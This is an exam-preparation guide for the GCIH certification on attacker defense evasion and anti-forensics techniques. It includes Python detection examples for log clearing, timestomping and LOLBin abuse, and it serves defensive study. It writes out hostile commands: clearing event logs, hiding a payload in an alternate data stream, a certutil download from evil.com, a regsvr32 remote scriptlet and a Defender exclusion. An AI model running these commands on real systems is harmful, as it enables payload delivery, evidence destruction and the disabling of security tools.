Defense Evasion and Anti-Forensics
Defense Evasion and Anti-Forensics are critical concepts in the GCIH domain, focusing on techniques attackers use to avoid detection and hinder investigation efforts during and after a compromise. **Defense Evasion** encompasses methods attackers employ to bypass security controls, evade monitoring systems, and remain undetected within a target environment. Common techniques include: disabling or tampering with security tools (antivirus, EDR, SIEM agents), obfuscating malicious code through encryption or encoding, leveraging living-off-the-land binaries (LOLBins) such as PowerShell, WMI, or certutil to blend with legitimate activity, process injection into trusted processes, DLL side-loading, timestomping to alter file metadata, and using fileless malware that operates entirely in memory. Attackers may also manipulate access tokens, exploit trusted relationships, or use rootkits to hide their presence at the OS or firmware level. Techniques like clearing or modifying event logs, using encrypted communication channels (C2 over HTTPS/DNS), and masquerading as legitimate services further complicate detection. **Anti-Forensics** specifically targets the investigative process, aiming to destroy, alter, or obscure digital evidence. Key techniques include: secure deletion of files using tools like SDelete or shred, log wiping or selective log tampering, encrypting stolen data or communications, steganography to hide data within innocuous files, manipulating filesystem timestamps (timestomping), using encrypted volumes or hidden partitions, and trail obfuscation through VPNs, Tor, or compromised intermediary systems.
Attackers may also employ data hiding in slack space, alternate data streams (ADS) in NTFS, or corrupt forensic artifacts deliberately. For incident handlers, understanding these techniques is essential for effective detection and response. Countermeasures include centralized and immutable logging, endpoint detection and response (EDR) solutions, memory forensics, behavioral analytics, integrity monitoring, and maintaining proper chain of custody. Proactive threat hunting and AI-powered anomaly detection are increasingly vital to identify sophisticated evasion attempts that traditional signature-based tools may miss.
Defense Evasion and Anti-Forensics: A Comprehensive Guide for GIAC GCIH Exam Preparation
Why Defense Evasion and Anti-Forensics Matter
Defense evasion and anti-forensics represent some of the most critical topics in incident handling and cybersecurity. Attackers who successfully compromise a system don't simply stop after gaining access — they actively work to remain undetected, persist in the environment, and destroy or manipulate evidence of their activities. Understanding these techniques is essential for incident handlers because:
• Detection depends on knowing what to look for: If you don't understand how attackers hide, you cannot effectively find them.
• Incident response quality hinges on forensic integrity: Anti-forensic techniques can render an investigation incomplete or misleading.
• Organizations lose millions when attackers dwell undetected for extended periods — the average dwell time is still measured in weeks or months.
• The GCIH exam heavily tests your ability to recognize, describe, and counter these techniques as part of the post-exploitation phase of an attack.
What Is Defense Evasion?
Defense evasion refers to any technique an attacker uses to avoid detection by security tools, analysts, or automated systems. This maps directly to the MITRE ATT&CK Tactic TA0005 (Defense Evasion), which contains dozens of documented techniques. The goal is to allow the attacker to maintain access, move laterally, and accomplish objectives without triggering alerts or being discovered.
Common categories of defense evasion include:
• Disabling or modifying security tools (antivirus, EDR, firewalls)
• Obfuscation of malicious code or commands
• Living off the land (LOLBins) — using legitimate system tools for malicious purposes
• Process injection — hiding malicious code within legitimate processes
• Masquerading — renaming malicious files to look like legitimate ones
• Timestomping — altering file timestamps to blend in
• Signed binary proxy execution — using trusted, signed binaries to execute malicious code
• Indicator removal — clearing logs, deleting artifacts
What Is Anti-Forensics?
Anti-forensics is a subset of defense evasion specifically aimed at undermining forensic investigation. While defense evasion focuses on avoiding real-time detection, anti-forensics focuses on destroying, hiding, or manipulating evidence so that even after an attack is suspected, investigators cannot reconstruct what happened.
The key goals of anti-forensics are:
• Evidence destruction: Deleting logs, wiping disk sectors, clearing browser history
• Evidence hiding: Using steganography, alternate data streams (ADS), slack space, or encrypted containers
• Evidence tampering: Modifying timestamps, altering log entries, changing file metadata
• Trail obfuscation: Using proxies, VPNs, Tor, or compromised third-party systems to obscure the origin of attacks
• Undermining forensic tools: Crafting data that causes forensic tools to crash or produce incorrect results
How Defense Evasion Works — Key Techniques in Detail
1. Log Clearing and Manipulation
Attackers frequently target system logs to remove evidence of their activities. On Windows, this involves clearing the Security, System, and Application event logs using commands like:
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
Or using PowerShell: Clear-EventLog -LogName Security
On Linux, attackers may truncate or delete /var/log/auth.log, /var/log/syslog, /var/log/wtmp, /var/log/btmp, and .bash_history. They may also use shred to securely overwrite log files.
Exam Tip: Know that Windows Event ID 1102 indicates the Security log was cleared, and Event ID 104 indicates the System log was cleared. These are critical artifacts that survive even after log clearing because they are generated by the act of clearing itself.
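A detection pass over forwarded event records, added here as an example and not code from the guide: it picks out the 1102/104 clearing events, reports which account cleared which log, and shows how many earlier records the SIEM copy retains. The record layout is a simplified constructed form, not a real EVTX parse.

```python
"""Added example (not from the original guide): find log-clearing events in
forwarded Windows event records.  Event ID 1102 (Security log) and Event ID
104 (System log) are written by the act of clearing, so they survive locally
and, when forwarded, on the SIEM.  Records are constructed samples in an
assumed dict layout, not a real EVTX parse."""
from datetime import datetime

# Constructed sample of forwarded records (not real data).
SAMPLE_EVENTS = [
    {"log": "Security", "id": 4624, "time": "2024-03-01T09:12:00", "user": "jdoe"},
    {"log": "Security", "id": 4688, "time": "2024-03-01T09:15:30", "user": "jdoe"},
    {"log": "Security", "id": 1102, "time": "2024-03-01T09:40:02", "user": "svc_backup"},
    # Event 104 names the cleared log in its Channel field.
    {"log": "System", "id": 104, "time": "2024-03-01T09:40:05", "user": "svc_backup",
     "channel": "System"},
    {"log": "Security", "id": 4624, "time": "2024-03-01T09:41:10", "user": "svc_backup"},
]

# (log, event id) pairs that exist only because a log was cleared.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def find_log_clearing(events):
    """One finding per clearing event: which log, who cleared it, when, and
    how many earlier records from that log the SIEM still holds (the count
    that would have been lost if only local logs existed)."""
    findings = []
    for ev in events:
        if (ev["log"], ev["id"]) not in CLEAR_EVENTS:
            continue
        cleared = ev.get("channel", ev["log"])
        t_clear = datetime.fromisoformat(ev["time"])
        survived = sum(1 for e in events if e["log"] == cleared
                       and datetime.fromisoformat(e["time"]) < t_clear)
        findings.append({"cleared_log": cleared, "event_id": ev["id"],
                         "by": ev["user"], "time": ev["time"],
                         "forwarded_records_before_clear": survived})
    return findings


def accounts_clearing_logs(events):
    """Distinct accounts that cleared any log, a useful triage pivot."""
    return sorted({f["by"] for f in find_log_clearing(events)})


if __name__ == "__main__":
    for finding in find_log_clearing(SAMPLE_EVENTS):
        print(finding)
```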
2. Timestomping
Timestomping involves modifying the $STANDARD_INFORMATION attribute timestamps in NTFS (Modified, Accessed, Created, and Entry Modified, collectively known as the MACE times). Tools like Timestomp (from the Metasploit Framework) allow attackers to change these values so that malicious files appear to have been created long ago.
Key Defense: The $FILE_NAME attribute in the MFT (Master File Table) also stores timestamps and is much harder for attackers to modify. Forensic analysts compare $STANDARD_INFORMATION and $FILE_NAME timestamps — discrepancies indicate timestomping.
Exam Tip: Remember that $STANDARD_INFORMATION timestamps are easily modified, but $FILE_NAME timestamps are not typically modified by standard timestomping tools. This comparison is a key forensic detection method.
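The $SI versus $FN comparison as detection code, added here as an example rather than code from the guide. The MFT records are constructed samples; a real run would take them from an MFT parser export, which this example assumes.

```python
"""Added example (not from the original guide): flag probable timestomping by
comparing $STANDARD_INFORMATION ($SI) and $FILE_NAME ($FN) timestamps taken
from MFT records.  The records are constructed samples; a real run would
take them from an MFT parser export, which this example assumes."""
from datetime import datetime

# Constructed MFT-derived records (not real data).  NTFS stores 100 ns
# units, so the fraction has seven digits.
SAMPLE_MFT = [
    {"path": r"C:\Windows\System32\legit.dll",     # untouched file
     "si_created": "2023-11-02T14:21:07.4412537", "fn_created": "2023-11-02T14:21:07.4412537"},
    {"path": r"C:\Users\Public\update.exe",         # backdated $SI
     "si_created": "2019-07-16T04:45:52.0000000", "fn_created": "2024-03-01T09:38:41.9921003"},
    {"path": r"C:\Users\Public\report.docx",        # copied file, both set at copy time
     "si_created": "2024-02-20T11:00:03.1200458", "fn_created": "2024-02-20T11:00:03.1200458"},
]


def parse_ts(ts):
    """Return (datetime, fraction string) for 'YYYY-MM-DDTHH:MM:SS.fffffff'."""
    base, _, frac = ts.partition(".")
    dt = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S")
    return dt.replace(microsecond=int((frac + "000000")[:6])), frac


def timestomp_indicators(rec):
    """Heuristic indicators for one record.  Only the creation time is
    compared: $SI modified can legitimately be older than $FN (file copies
    keep the source's modified time), so it would produce false positives."""
    reasons = []
    si, si_frac = parse_ts(rec["si_created"])
    fn, _ = parse_ts(rec["fn_created"])
    if si < fn:
        reasons.append("$SI created predates $FN created")
    # Many timestomping tools write second-granular values, leaving the
    # 100 ns fraction all zeros; genuine file system writes rarely do.
    if si_frac and set(si_frac) == {"0"}:
        reasons.append("$SI created has zeroed sub-second fraction")
    return reasons


def suspected_timestomping(records):
    """Map path -> indicator list for records that trigger at least one."""
    return {r["path"]: timestomp_indicators(r)
            for r in records if timestomp_indicators(r)}


if __name__ == "__main__":
    for path, why in suspected_timestomping(SAMPLE_MFT).items():
        print(path, "->", "; ".join(why))
```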
3. Alternate Data Streams (ADS)
NTFS supports Alternate Data Streams, which allow data to be hidden within a file without changing the file's apparent size. An attacker could hide a malicious payload in an ADS:
type malware.exe > innocentfile.txt:hidden.exe
The hidden stream is not visible through normal directory listings. Detection requires tools like streams.exe (Sysinternals) or dir /r.
4. Process Injection
Attackers inject malicious code into legitimate processes to evade detection. Common techniques include:
• DLL Injection: Forcing a legitimate process to load a malicious DLL
• Process Hollowing: Creating a legitimate process in a suspended state, replacing its memory with malicious code, then resuming it
• Reflective DLL Injection: Loading a DLL from memory without touching disk
• Thread Execution Hijacking: Injecting code into an existing thread of a running process
Exam Tip: Process injection allows malicious code to run under the context of a trusted process (like svchost.exe or explorer.exe), making it harder for security tools to flag the activity as malicious.
5. Living Off the Land Binaries (LOLBins)
Attackers use legitimate system binaries to execute malicious actions, avoiding the need to drop custom malware. Key examples include:
• PowerShell: Downloading and executing payloads in memory
• certutil.exe: Downloading files (certutil -urlcache -split -f http://evil.com/payload.exe)
• mshta.exe: Executing HTA files containing malicious scripts
• regsvr32.exe: Executing scriptlets from remote URLs (Squiblydoo attack)
• rundll32.exe: Executing malicious DLLs
• wmic.exe: Process creation, lateral movement
• bitsadmin.exe: Downloading files in the background
Exam Tip: The GCIH exam may present scenarios where these tools are used. You should be able to identify when a legitimate tool is being abused for malicious purposes.
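Rule-based triage of process-creation events for the LOLBin abuse patterns listed above, added here as an example and not code from the guide. The events are constructed samples in a simplified Sysmon Event ID 1 shape (Image, CommandLine, ParentImage); the field names and rule set are assumptions of this example.

```python
"""Added example (not from the original guide): rule-based triage of
process-creation telemetry for LOLBin abuse.  Events are constructed samples
in a simplified Sysmon Event ID 1 shape (Image, CommandLine, ParentImage);
the field names and the rule set are assumptions of this example."""
import re

# (binary, case-insensitive regex over the command line, finding text).
# The patterns cover the abuse cases listed above, not every LOLBin.
LOLBIN_RULES = [
    ("certutil.exe", r"-urlcache\b.*\b(https?|ftp)://", "certutil used as a downloader"),
    ("regsvr32.exe", r"/i:\S*https?://|scrobj\.dll", "regsvr32 remote scriptlet (Squiblydoo)"),
    ("mshta.exe", r"https?://|javascript:|vbscript:", "mshta running remote or inline script"),
    ("rundll32.exe", r"javascript:|\\users\\|\\temp\\", "rundll32 with script or user-path DLL"),
    ("bitsadmin.exe", r"/transfer\b", "bitsadmin download job"),
    ("powershell.exe", r"-enc(odedcommand)?\b|\biex\b|downloadstring", "PowerShell encoded or in-memory execution"),
]
# A LOLBin spawned by an Office application is a classic macro-abuse signal.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\p.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",      # benign use
     "CommandLine": "certutil -verify mycert.cer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /i:http://203.0.113.5/a.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\rundll32.exe",      # benign use
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def match_lolbin(event):
    """Findings for one event: matched rule texts plus a parent-process note."""
    image, cmd = basename(event["Image"]), event["CommandLine"]
    hits = [text for binary, pattern, text in LOLBIN_RULES
            if binary == image and re.search(pattern, cmd, re.IGNORECASE)]
    parent = basename(event["ParentImage"])
    if hits and parent in OFFICE_PARENTS:
        hits.append(f"spawned by Office process {parent}")
    return hits


def triage(events):
    """(index, findings) for every event that matched at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := match_lolbin(e))]
```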
6. Disabling Security Tools
Attackers may attempt to:
• Stop antivirus or EDR services
• Unload Sysmon drivers
• Modify Windows Defender exclusions via PowerShell: Set-MpPreference -ExclusionPath 'C:\malware'
• Kill security processes using tools like Process Hacker or custom kernel drivers
• Tamper with ETW (Event Tracing for Windows) to blind security tools
7. Encryption and Packing
Malware authors use packers, crypters, and custom encryption to evade signature-based detection. Packed malware appears different to every AV engine because the binary is compressed or encrypted, and the actual malicious code is only revealed at runtime in memory.
8. Fileless Malware
Fileless techniques execute entirely in memory without writing malicious files to disk. This includes:
• PowerShell-based attacks using Invoke-Expression or IEX
• WMI event subscriptions for persistence
• Registry-resident malware
• Malicious macros that execute shellcode directly in memory
Exam Tip: Fileless malware is harder to detect with traditional AV and leaves fewer forensic artifacts. Memory forensics (using tools like Volatility) becomes essential.
9. Rootkits
Rootkits operate at a deep level (kernel-level or firmware-level) to hide the presence of malware. They can:
• Hide processes from task managers
• Hide files from directory listings
• Hide network connections from netstat
• Intercept and modify system calls
User-mode rootkits hook API calls in user space, while kernel-mode rootkits modify kernel structures (e.g., DKOM — Direct Kernel Object Manipulation).
10. Steganography
Attackers can hide data (commands, exfiltrated data, malware payloads) within image files, audio files, or other media. This allows covert communication channels that are extremely difficult to detect without specialized tools.
11. Secure Deletion and Disk Wiping
Tools like sdelete (Sysinternals), cipher /w, shred (Linux), and BleachBit can securely overwrite deleted data to prevent recovery. Attackers may also use dd on Linux to overwrite specific disk areas.
How Anti-Forensics Impacts Incident Response
Anti-forensics directly challenges every phase of the forensic process:
• Identification: If logs are cleared, identifying that an incident occurred becomes harder
• Preservation: If evidence is being actively destroyed, the window for collection narrows
• Analysis: Tampered timestamps and manipulated artifacts lead investigators astray
• Reporting: Gaps in evidence make it difficult to build a complete timeline or support legal proceedings
Countermeasures and Detection Strategies
Understanding defenses is just as important for the GCIH exam:
• Centralized logging (SIEM): Forward logs to a remote, hardened log server so attackers cannot destroy them by clearing local logs
• File integrity monitoring (FIM): Detect unauthorized changes to critical files and configurations
• MFT analysis: Compare $STANDARD_INFORMATION and $FILE_NAME timestamps to detect timestomping
• Memory forensics: Use tools like Volatility to detect process injection, fileless malware, and rootkits
• Behavioral detection (EDR): Monitor for suspicious process behavior rather than relying solely on signatures
• Application whitelisting: Restrict which binaries can execute, limiting LOLBin abuse
• Script block logging and module logging: Enable PowerShell logging (Event IDs 4103, 4104) to capture obfuscated commands
• Sysmon: Deploy Sysmon with detailed configurations to capture process creation, network connections, file creation timestamps, and more
• Network monitoring: Detect unusual outbound connections, DNS tunneling, and other covert channels
• Volume Shadow Copies: Check VSS for previous versions of files that attackers may have modified or deleted
Exam Tips: Answering Questions on Defense Evasion and Anti-Forensics
1. Know the MITRE ATT&CK Framework Mapping
The GCIH exam often frames questions using real-world scenarios. Being able to map an activity to a MITRE ATT&CK technique (e.g., T1070 — Indicator Removal on Host, T1055 — Process Injection, T1036 — Masquerading) will help you quickly identify the correct answer.
2. Focus on Detection Artifacts
Exam questions frequently ask: "What evidence would indicate that [evasion technique] was used?" Prepare by memorizing key indicators:
• Log clearing → Event ID 1102 (Security), Event ID 104 (System)
• Timestomping → Mismatch between $STANDARD_INFORMATION and $FILE_NAME
• Process injection → Unexpected DLLs loaded, memory anomalies
• PowerShell abuse → Event IDs 4103 (Module Logging), 4104 (Script Block Logging)
• ADS usage → dir /r or streams.exe showing hidden streams
3. Understand the Attacker's Goal
When reading a scenario, ask yourself: Is the attacker trying to avoid real-time detection (defense evasion) or destroy/hide evidence after the fact (anti-forensics)? This distinction helps you select the most appropriate answer.
4. Remember the Forensic Countermeasure for Each Technique
The exam often pairs an evasion technique with its forensic counter:
• Log clearing → Centralized logging / SIEM
• Timestomping → MFT analysis ($FILE_NAME attribute)
• Fileless malware → Memory forensics (Volatility)
• Rootkits → Boot from trusted media, integrity checking
• Secure deletion → Volume Shadow Copies, backup analysis
• Encrypted communications → Network metadata analysis, SSL/TLS inspection
5. Know Your Tools
Be familiar with both attacker tools and defender tools:
• Attacker tools: Metasploit (timestomp, meterpreter), Mimikatz, PsExec, Cobalt Strike, BleachBit
• Defender tools: Volatility, Sysmon, Autoruns, Process Monitor, FTK, EnCase, Wireshark, Zeek
6. Practice Scenario-Based Reasoning
The GCIH exam is scenario-heavy. You might see something like: "An analyst notices that several security event logs are empty, but Event ID 1102 is present in the Security log. What does this indicate?" The answer is that the logs were deliberately cleared by an attacker (or compromised account). Practice mapping observations to conclusions.
7. Pay Attention to the Kill Chain Phase
Defense evasion and anti-forensics occur during the post-exploitation phase. If a question describes activity after initial access has been achieved, think about evasion and persistence techniques.
8. Don't Confuse Similar Techniques
• Timestomping changes timestamps; log tampering modifies log content
• Process injection hides in legitimate processes; masquerading renames files to look legitimate
• Encryption protects data in transit/at rest; obfuscation makes code harder to analyze
• Rootkits hide at the OS level; fileless malware avoids disk but may not hide at the kernel level
9. Index Your Materials Effectively
For the GCIH exam (which is open book), create index entries for:
• Each major evasion technique with a brief description
• Detection methods and associated Event IDs
• Tool names (both offensive and defensive)
• MITRE ATT&CK technique IDs for quick reference
10. Time Management
Defense evasion questions can be wordy with detailed scenarios. Read the question carefully, identify the key indicator or behavior described, and match it to the technique. Don't overthink — the GCIH exam rewards practical knowledge over theoretical depth.
Summary Table: Quick Reference for Exam Day
Technique → Detection Method → Key Artifact
Log Clearing → SIEM / Event ID 1102, 104 → Empty logs with clearing event present
Timestomping → MFT Analysis → $SI vs $FN timestamp mismatch
ADS → dir /r, streams.exe → Hidden data streams in NTFS
Process Injection → Memory forensics, EDR → Unexpected code in legitimate processes
LOLBins → Command-line logging, Sysmon → Legitimate tools with suspicious arguments
Fileless Malware → Memory forensics, PowerShell logging → Event IDs 4103/4104, memory artifacts
Rootkits → Integrity checking, trusted boot media → Hidden processes/files/connections
Secure Deletion → VSS, backup analysis → Missing expected files, overwrite patterns
Steganography → Steganalysis tools → Anomalous file sizes, statistical analysis
Disabling Security → Service monitoring, tamper protection → Stopped services, modified configurations
Final Thought: Defense evasion and anti-forensics questions on the GCIH exam test your ability to think like both an attacker and a defender. Master the techniques, know the artifacts they leave behind (or try to destroy), and understand the countermeasures. This dual perspective is the key to answering these questions confidently and correctly.